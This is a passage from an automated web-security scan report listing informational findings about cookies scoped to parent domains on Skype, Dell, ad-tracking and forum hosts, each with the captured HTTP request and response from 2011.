10.48. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.skype.com
Path:   /b/ss/skypeallprod/1/H.17/s33706402148852

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/skypeallprod/1/H.17/s33706402148852?AQB=1&ndh=1&t=4/8/2011%2012%3A59%3A48%200%20300&vmt=4AAF54FD&ce=UTF-8&ns=skype&pageName=clientlogin/account&g=file%3A///C%3A/ProgramData/Skype/Apps/login/index.html&cc=EUR&ch=clientlogin&events=event47&c5=en&v5=en&v6=0/5.5.0.114&c24=0/5.5.0.114&v36=client%7Creg-a%7C0/5.5.0.114&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=720&bh=472&pe=lnk_o&pev2=ClientOnCreateAccount&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: metrics.skype.com

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 17:59:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|2731DE37051D260E-4000010C00147A96[CE]; Expires=Fri, 2 Sep 2016 17:59:10 GMT; Domain=.skype.com; Path=/
Location: http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852?AQB=1&pccr=true&vidn=2731DE37051D260E-4000010C00147A96&&ndh=1&t=4/8/2011%2012%3A59%3A48%200%20300&vmt=4AAF54FD&ce=UTF-8&ns=skype&pageName=clientlogin/account&g=file%3A///C%3A/ProgramData/Skype/Apps/login/index.html&cc=EUR&ch=clientlogin&events=event47&c5=en&v5=en&v6=0/5.5.0.114&c24=0/5.5.0.114&v36=client%7Creg-a%7C0/5.5.0.114&s=1920x1200&c=16&j=1.5&v=Y&k=Y&bw=720&bh=472&pe=lnk_o&pev2=ClientOnCreateAccount&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 17:59:10 GMT
Last-Modified: Mon, 05 Sep 2011 17:59:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www96
Content-Length: 0
Content-Type: text/plain


10.49. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=208&cgn=14038&seg=7820 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pixel.33across.com
Proxy-Connection: Keep-Alive
Cookie: 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 21:13:41 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217; Domain=.33across.com; Expires=Mon, 03-Sep-2012 21:13:41 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8939182109&seg=150349&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%3D1211914&random=918826
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


10.50. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-46B_c711bvEMM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-46B_c711bvEMM.gif?labels=_fp.event.Paid+Service+Interest HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pixel.quantserve.com
Proxy-Connection: Keep-Alive
Cookie: mc=4e52c256-eb5bd-332bf-dc3b7; d=ENkBBgHIBw

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EMEBBgHQBw; expires=Sat, 03-Dec-2011 21:13:41 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 04 Sep 2011 21:13:41 GMT
Server: QS

GIF89a.......,.................D..;

10.51. http://pixel.quantserve.com/pixel/p-56WJ0KtIxWJ_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-56WJ0KtIxWJ_2.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-56WJ0KtIxWJ_2.gif?r=0.10386542603373528 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.4725153
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: qoo=OPT_OUT; d=EC4BHQHQB7vRC74Rggi_ELqlAA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/unpixel?pixelID=17329&partnerID=166&clientID=3051&key=segment&_qoo=OPT_OUT
Set-Cookie: d=EO4BGgHRB7vRHN4Ri_ELqlA; expires=Sun, 04-Dec-2011 02:30:49 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 05 Sep 2011 02:30:49 GMT
Server: QS


10.52. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=xsKlvalg4lwfy8LPcIiVCPKkpSxp_RJng-zvuwC70piejuJEq_LImxDsetEai8Le1n88qWVlF6FRdkauRZlBdQ HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2305757;type=hpcom559;cat=hpcom619;ord=1;num=6795315628405.66?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=6981940571811189480; Domain=.turn.com; Expires=Fri, 02-Mar-2012 16:19:49 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 16:19:49 GMT

GIF89a.............!.......,...........D..;

10.53. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/149046210 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898886726b8b8a1ec2f8&rand=1315189888672&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_formattext&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_formattext&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=6981940571811189480; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:53 GMT; Path=/
Set-Cookie: rrs=1002; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:53 GMT; Path=/
Set-Cookie: rds=15222; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:53 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/
Content-Length: 0
Date: Mon, 05 Sep 2011 02:30:52 GMT


10.54. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/1662255836 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=6981940571811189480; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:52 GMT; Path=/
Set-Cookie: rrs=1002; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:52 GMT; Path=/
Set-Cookie: rds=15222; Domain=.turn.com; Expires=Sat, 03-Mar-2012 02:30:52 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/6981940571811189480/mchpid/2/url/
Content-Length: 0
Date: Mon, 05 Sep 2011 02:30:51 GMT


10.55. http://search.dell.com/public/css.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.dell.com
Path:   /public/css.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/css.aspx?c=us&l=en&~set=search.dell.com.80 HTTP/1.1
Host: search.dell.com
Proxy-Connection: keep-alive
Referer: http://search.dell.com/results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; search_bn=us|bsd|SearchBaynoteEnabled.1; dellsearch=srchb=control&rpp=12; StormPCookie=bandwidth=NA; StormSCookie=bandwidth=NA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=3600
Date: Sun, 04 Sep 2011 16:19:57 GMT
Content-Type: text/css; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 16:19:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 123299

#accordionnoresults {padding-top:1px;padding-left:5px}#additionalresultscontrol {margin-left: 10px; margin-top: 10px; }#additionalresultscontrolhr {margin-left: 20px; margin-right: 20px; margin-top: 1
...[SNIP]...

10.56. http://search.dell.com/public/menu.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.dell.com
Path:   /public/menu.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/menu.aspx?c=us&l=en&s=bsd&cs=04 HTTP/1.1
Host: search.dell.com
Proxy-Connection: keep-alive
Referer: http://search.dell.com/results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; search_bn=us|bsd|SearchBaynoteEnabled.1; dellsearch=srchb=control&rpp=12; StormPCookie=bandwidth=NA; StormSCookie=bandwidth=NA

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:20:00 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:20:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 68855

// menu definition for c=us&l=en&s=bsd&cs=04
//
var m_0_0_Menu = new Array( new menuItem( "Laptops", "http://www.dell.com/p/vostro-laptop-deals.aspx?c=us&cs=04&l=en&s=bsd" ), new menuItem( "Desktops
...[SNIP]...

10.57. http://search.dell.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.dell.com
Path:   /results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all HTTP/1.1
Host: search.dell.com
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:19:59 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: dellsearch=srchb=control&rpp=12; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA; domain=.dell.com; path=/
Vary: Accept-Encoding
Content-Length: 90930

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>xss -
...[SNIP]...

10.58. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:01 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=652814312; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 21:10:01 GMT
Expires: Mon, 03 Sep 2012 21:10:01 GMT
Content-Length: 6757
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

10.59. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1625505944; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 21:09:48 GMT
Expires: Mon, 03 Sep 2012 21:09:48 GMT
Content-Length: 7243
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

10.60. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1901988215; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 6611
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

